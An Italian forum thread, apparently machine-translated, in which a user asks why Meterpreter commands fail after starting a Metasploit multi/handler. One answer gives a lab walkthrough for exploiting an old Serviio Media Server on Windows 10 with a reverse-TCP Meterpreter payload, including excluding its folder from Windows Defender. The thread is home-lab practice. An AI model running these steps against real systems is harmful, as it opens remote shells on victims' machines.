I comandi Meterpreter non funzionano nella shell [chiuso]

0

Ho usato use multi/handler seguito da set PAYLOAD windows/meterpreter/reverse_tcp poi set LPORT 80 e set LHOST 192.168.0.11 dopo che faccio exploit -j -z e vado sulla mia macchina Windows collegata alla stessa rete e mi connetto a 192.168.0.11:80 quindi apro la mia sessione con sessions -i 1 poi im nella shell meterpreter. Quando provo a eseguire ls, ps, cd, download ecc., Ottengo Unknown Command: command . Che cosa sto facendo di sbagliato? Alcuni comandi come help funzionano ancora.

    
posta DapperDaniel 01.05.2018 - 01:06
fonte

2 risposte

1

Semplicemente, non puoi farlo. Ti sei messo in posizione multi / handler con meterpreter reverse_tcp come payload e poi sei andato sul tuo computer vittima e l'hai visitato come un sito web. Vedi, il multi / gestore si aspetta una connessione da un payload meterpreter non da un browser web. Ecco perché non è possibile eseguire nulla.

Per eseguire il backup di ciò che ho detto, provalo un'altra volta senza le opzioni j e z. Quando vai sul tuo computer Windows e visiti la tua casella di attacco, vedrai che la connessione viene interrotta dopo che la stringa di user-agent è stata visualizzata.

Non ascoltare gli altri che non hanno nemmeno letto attentamente il tuo post.

    
risposta data 10.05.2018 - 00:40
fonte
0

Come ti stai connettendo dalla macchina Windows di destinazione alla tua macchina attaccante?

Sembra che dal momento che stai automaticamente facendo il backstage della sessione, non vedi dove la sessione non viene mai creata. Prova solo a "sfruttare" senza i flag e non dovresti ottenere il prompt meterpreter come sei ora. La sessione muore dopo circa un minuto?

Per far funzionare tutto questo, devi trovare una vulnerabilità da sfruttare, che fornirà il carico utile e ti ricollegherà. Dovresti solo usare multi / handler per gli exploit lanciati al di fuori di Metasploit, ma non è chiaro se lo fai o meno.

modifica Ho cercato, trovato e testato un'applicazione vulnerabile che è possibile utilizzare per esercitarsi in Windows 10. Non so quali siano le regole per la pubblicazione di collegamenti per software vulnerabili, quindi mi limiterò a dirigerti: Serviio Media Server ha una vulnerabilità legata all'esecuzione dei comandi in alcune delle sue versioni precedenti. Le informazioni sul modulo Metasploit si trovano qui . Ho provato questo con 1.7.1, quindi vai al link e copia il link per la versione di Windows e cambia la versione corrente che stanno servendo ( 1.9.1) a 1.7.1 (letteralmente basta cambiare il 9 in un 7).

Installa Serviio Media Server sul tuo Windows 10 box. Raccomanderei di autorizzare temporaneamente la lista di Drive: \ Programmi \ Serviio \ bin in Windows Defender perché prenderà Meterpreter.

Dalla tua macchina attaccante:

msf > usa exploit / windows / http / serviio_checkstreamurl_cmd_exec (imposta l'exploit)

msf exploit (windows ...) > mostra le opzioni

Vedrai che devi impostare RHOST (la tua macchina Win10) e SRVHOST (la tua macchina attaccante).

Quindi imposta il tuo payload (andremo con la shell Meterpreter inversa):

msf exploit (windows ...) > imposta payload windows / meterpreter / reverse_tcp

imposta il tuo LHOST sulla tua macchina attaccante.

exploit msf (windows ...) > exploit

Spero che questo aiuti. Buona fortuna e per favore usa questa roba per sempre:)

    
risposta data 01.05.2018 - 03:52
fonte

Leggi altre domande sui tag